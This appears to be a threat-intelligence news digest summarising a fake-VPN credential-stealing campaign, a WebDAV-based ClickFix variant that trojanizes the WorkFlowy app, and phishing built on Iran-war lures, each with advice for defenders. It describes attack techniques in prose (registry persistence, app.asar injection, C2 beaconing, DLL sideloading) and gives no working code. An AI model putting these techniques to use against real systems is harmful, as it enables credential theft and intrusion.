Trending Topics

Fake VPN Clients Distributed Through SEO Poisoning Campaign

Microsoft has uncovered a credential-stealing campaign that uses fake VPN clients to compromise enterprise credentials. The campaign, attributed to the threat actor Storm-2561, uses SEO poisoning to lure users into downloading malicious VPN installers hosted on attacker-controlled websites. Disguised as trusted enterprise software, these trojans are digitally signed and distributed through ZIP files intended to appear legitimate. Observed since mid-January 2026, this campaign builds on earlier attacks documented by Cyjax and Zscaler, in which users searching for popular VPN software such as Ivanti Secure Access, SonicWall, or Hanwha Vision were redirected to fake sites via Bing search results. The malicious installers deploy a variant of the Hyrax information stealer that captures VPN credentials via a counterfeit sign-in screen. Victims are then shown an error message and sometimes redirected to the genuine vendor site to maintain the illusion of legitimacy. According to Microsoft, the malware achieves persistence by abusing the Windows RunOnce registry key and uses a certificate from a compromised company to appear authentic. The company has since revoked the certificate and taken down the malicious GitHub repositories used in distribution. Microsoft advises organizations to enable multi-factor authentication, verify software authenticity, and avoid downloading installers from unofficial sources to mitigate future credential theft campaigns.

ClickFix Evolves: WorkFlowy Electron App Abused in New WebDAV-Backed Campaign

Atos researchers have uncovered a new ClickFix variant that abuses the Windows Win+R shortcut to trick users into running a “net use” command that mounts an attacker-controlled WebDAV share and executes a batch script from a mapped network drive. The script downloads a ZIP archive, unpacks a trojanized copy of the legitimate WorkFlowy Electron desktop app, and runs it with malicious code injected into the app’s app[.]asar archive, turning WorkFlowy into both a C2 beacon and a dropper. This variant notably bypassed Microsoft Defender for Endpoint and was only detected through targeted threat hunting that focused on suspicious execution chains originating from the RunMRU registry key, a hallmark of ClickFix activity.​ Inside the modified WorkFlowy bundle (version 1.4.1050), attackers replaced the main js entry point with heavily obfuscated code that runs before any legitimate logic and effectively blocks normal application functionality while executing with full Node js privileges outside the Chromium sandbox. The malware continuously beacons to a C2 domain, tags each victim using an ID stored in %APPDATA%\id[.]txt, and can receive base64-encoded payloads, write them to %TEMP%, and execute any delivered binaries. This ClickFix evolution is significant because it shifts away from commonly monitored tools like PowerShell, MSHTA, and WScript, instead abusing native networking utilities and WebDAV to deliver malware via seemingly normal filesystem operations. The attack chain demonstrates how threat actors can hide behind trusted applications and native OS features, reducing noisy indicators and shrinking the detection surface for automated tools. As ClickFix campaigns continue to adopt proxy execution techniques and trusted app abuse, organizations will need to combine strict browser- and script-control policies with proactive, hypothesis-driven threat hunting to surface weak behavioral signals early in the intrusion lifecycle.​

Iran War Becomes Prime Lure for State-Backed Phishing Campaigns

Multiple state‑aligned threat actors, including TA453, TA473, TA402, and several still‑developing clusters (UNK_InnerAmbush, UNK_NightOwl, UNK_RobotDreams), are weaponizing breaking news about the Iran war to run highly targeted phishing campaigns against governments and policy organizations across the Middle East and beyond. These operations mix classic espionage with credential theft and malware delivery, often abusing compromised government email accounts, consumer freemail, and trusted cloud platforms like Google Drive, Outlook Web App lookalikes, and spoofed OneDrive portals to increase credibility and bypass defenses. Many lures reference recent events such as Operation Epic Fury, rumored leadership deaths, Gulf energy infrastructure threats, or “Gulf Security Alert” warnings, frequently redirecting victims through convincing decoy documents or conflict‑tracking sites after harvesting credentials to reduce suspicion. China‑linked UNK_InnerAmbush, Pakistan‑aligned UNK_RobotDreams, and Middle East–focused TA402 have all used conflict‑themed emails and geofenced delivery to push loaders, Cobalt Strike beacons, and Rust‑based backdoors under the guise of photos, PDF briefings, or official alerts. Infrastructure and techniques include links to archives with LNK files masquerading as JPGs, DLL sideloading via signed binaries, fake Adobe Reader buttons that lead to malware installers, and phishing portals that closely mimic OWA authentication pages hosted on attacker‑controlled or compromised domains. Belarus‑aligned TA473 (Winter Vivern) has run parallel campaigns against European and Middle Eastern government entities using likely compromised infrastructure to pose as EU officials, underscoring the broader geopolitical interest in the conflict’s fallout. Amid this surge, TA453 (Charming Kitten / APT42) continues its hallmark slow‑burn espionage approach, using carefully crafted personas and benign documents to build trust with high‑value policy targets before pivoting to credential harvesting pages branded as legitimate cloud file portals. Across all observed activity, the Iran war serves both as a powerful social engineering pretext and as a driver of shifting collection priorities, with some actors using the crisis mainly as a topical cover for ongoing intelligence requirements and others clearly expanding efforts to gather sensitive information on Middle Eastern governments and diplomatic channels. For defenders, this wave highlights the need to treat conflict‑related content as high‑risk by default, tighten controls on cloud and webmail access, and invest in behavioral detection and threat hunting to spot abuse of trusted services rather than relying solely on static indicators.

Top CVEs of the Week

Top CVEs of the Week – As part of our ongoing vulnerability monitoring, the following CVEs highlight recent security issues that could affect a range of systems, applications, and devices. These findings reflect the constantly evolving threat landscape and reinforce the importance of timely patching, secure configurations, and proactive security practices. Below is a summary of notable vulnerabilities, including their impact and any available remediation guidance.